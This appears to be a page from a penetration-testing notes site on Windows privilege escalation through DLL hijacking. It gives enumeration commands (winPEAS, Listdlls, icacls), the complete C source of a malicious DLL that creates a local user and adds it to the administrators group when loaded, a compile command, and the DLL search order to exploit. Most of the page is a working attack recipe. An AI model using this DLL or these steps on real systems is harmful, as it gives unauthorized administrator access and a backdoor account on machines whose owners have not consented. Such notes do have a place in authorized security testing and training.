DLL Hijacking


.\winPEASany.exe quiet filesinfo \#Services with missing or hijackable DLLs (look for "NAME NOT FOUND" errors in the output)
.\Listdlls64.exe /accepteula ServiceName \#https://learn.microsoft.com/en-us/sysinternals/downloads/listdlls
icacls "C:\path\to\dll\folder"

\#include <stdlib.h>
\#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user blas blas123! /add");
i = system ("net localgroup administrators blas /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}

x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

Hijack DLL Searching Order #REPLACE DLL IN. FOLDER WITH ACCESS

The directory from which the application loaded.
The system directory.
The 16-bit system directory.
The Windows directory.
The current directory.
The directories that are listed in the PATH environment variable.

PreviousStored Credentials NextScheduled Tasks

Last updated 10 months ago